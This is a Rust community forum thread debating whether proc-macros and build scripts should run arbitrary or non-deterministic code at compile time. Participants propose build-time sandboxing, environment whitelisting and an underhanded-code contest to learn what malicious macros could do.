Is executing arbitrary code at build time a good idea?

FWIW, running arbitrary non-deterministic code at build time is very undesirable. I’d love it if there were a way to guarantee that proc-macros are always deterministic (or at least have a way to absolutely forbid anything that’s non-deterministic, like poking at external database schema).

Without that, there would never be a way for the build system to determine whether a given target is up to date, nor would there be a guaranteed way to reproduce a given target binary.

Proc-macros are probably OK, given that they can be audited, and there’s at least some friction to writing a new one - can you can detect their presence by looking at the dependency graph. Allowing any arbitrary code to do non-deterministic computation at compile time is definitely not OK.

@jsgf I respectfully disagree with you on this. Pretend that you need to solve a particular NP-complete problem instance to really optimize some block of code. You've done something really smart and written a procedural macro that is able to use rayon to parallelize the work, but since you have to search an exponential space, you really can't tell how long it will take. This is best done once, at compile time, on some really powerful dev machine (maybe overnight). The alternative is finding each block of code that needs this optimization, extracting it by hand, running some custom code over that extraction, and then putting it back into the code base. You can extend this idea to run it on something like scoop, which makes the compilation time non-deterministic.

It doesn’t matter if it’s a good idea. Proc macros are stable now and Rust guarantees they will be supported forever.

Shouldn’t you have the same concern about build scripts in general?

There’s a fine clarification here. There’s two kinds of before-runtime calculation that tends to all be shoved into “compile time” (which does keep it up to date) but have different connotations. Also, what does deterministic actually get for us?

I see two distinct precomputation types. Compile time macros are the normal, and typically cheap, manipulation of localized information. Const computation falls into the same bucket.

The best example of the other category is ML models; this is precomputed information that doesn’t need to be regenerated and shouldn’t be every build. This also has much weaker determinism requirements and ability.

Unless you’re concerned about full bit-for-bit reproducibility (which is a good but hard thing), what determinism gives you is consistent behavior and the ability for the compiler to aggressively cache things. For this reason, even nondeterministic proc macros aren’t an issue, so long as their surface area is.

I would think a nondeterministic proc macro is already forbidden (or rather, the compiler must make some assumptions about things proc macros do not do) because nondeterminism would destroy all hope of incremental compilation.

1 Like

I agree with this, however the existing Rust build-time code execution system is what it is, so we need to work within those constraints. We could potentially add new build-time restrictions which pass crater, though.

Myself and several other members of the Secure Code WG have discussed this extensively and several of us feel adding some sort of build-time sandboxing is a high priority item.

As it were, I just (as in hours ago, my blog post is still an evergrowing WIP) blogged about this as part of the 2019 roadmap, giving my rationale for why a build-time sandbox is a good idea:

I do intend to further expand that section with additional details of what an actual sandbox might look like. On Linux, it would be nice to find a seccomp policy which heavily restricts "exotic" system calls, so to reduce the likelihood of build.rs scripts escalating to root through kernel bugs.

4 Likes

I don’t think that eliminating all possible sources of nondeterminism is possible or desirable, but I do think we could do better at providing ways to detect and avoid inadvertent nondeterminism.

In particular, build scripts often use environment variables, and need to remember to manually print cargo:rerun-if-env-changed for all relevant ones. I’d like to see:

  • An option (or even a default) to clear the entire environment before running build scripts; the build script could then provide a whitelist of variables which would not be cleared, but which would trigger a rebuild if changed. Some variables, such as PATH, could be whitelisted by default. There would also have to be a way for the user to manually whitelist additional variables for various reasons. For instance, they might want to pass platform-specific environment variables to their C compiler when building a crate that uses cc-rs to compile C code: e.g. SDKROOT on macOS.

  • A tool to instrument getenv calls from build scripts and their subprocesses to identify environment variables they use. This would be especially useful without environment variable whitelisting, but still useful with it, because those variables could be added to the whitelist to save the user the inconvenience of manually whitelisting them. Instrumenting getenv requires platform-specific techniques and isn’t always possible (on Linux, it won’t work for statically-linked binaries), so such a tool would necessarily be “best-effort”, but it could work in the most common cases.

See also: https://github.com/rust-lang/cargo/issues/5282

1 Like

I fully agree with the sandboxing idea, but how will you do it? Is there a model of what is permissible, and what isn’t? I’m thinking back to my distributed compilation idea; right now, I think it may be possible to write a proc macro that allows you to reach across the network at compile time to distribute chunks of code for further processing. The problem is that means you can have a trojan horse; Evil Hacker™ contributes code to some project that includes a proc macro, that, when compiled, immediately starts scanning the network of the machine it’s being compiled on, and then sends that information to Evil Hacker™. So now we need a networking model that limits what damage a bad macro can inflict.

On top of that, the sandboxes will likely need to be recursive; vec![evil!(), evil!(), evil!()]; shouldn’t leak into vec!() if at all possible (that is too contrived, you should be able to think of something better).

In short, it’s a headache, and I’m glad you guys are working on it, and not me! :stuck_out_tongue:

I started an issue about this on the Secure Code WG, and wrote down some initial thoughts:

I think there are several directions this could take, and documented some prior art around "a model of what is permissible, and what isn’t".

I think there's a "do no harm" sandbox path that can be immediately pursued for restricting build scripts from doing things like exotic system calls (which no existing build scripts are using, but are potential local privilege escalation targets in the kernel).

But there's also an "ambitious" sandbox, which could use things like gaol to lock down compile-time code execution. It'd have to start off-by-default and have users opt-in, but with enough work I think something like that could be on-by-default in the next edition. Perhaps these scripts could have optional build-time capabilities, like network access, which crate users must opt into.

Both approaches have merit, I think, and can be worked on in parallel independent of each other.

@bascule I just replied on your Github issue, but quick recap for everyone here…

I propose that we create the underhanded rust code contest similar to the Underhanded C contest. We don’t have to write full rust out for everything, but it would gather into one place all the evil that can be done from within the compiler at compile time, which will inform what the security posture/sandbox will need to be in the future.

2 Likes

We sort of did create it already: http://blog.community.rs/underhanded/2017/09/27/underhanded-results.html But apparently we failed to make it a recurring thing?

2 Likes

Indeed, it was a one time thing (so far), due to the lack of people driving it forward. If people want to set up one again the Community Team would definitely be interested in promoting it.

Sounds like something the Secure Code WG could potentially carry forward

2 Likes

Let’s talk!

1 Like

I created a tracking issue here: https://github.com/rust-community/team/issues/256

This topic was automatically closed 90 days after the last reply. New replies are no longer allowed.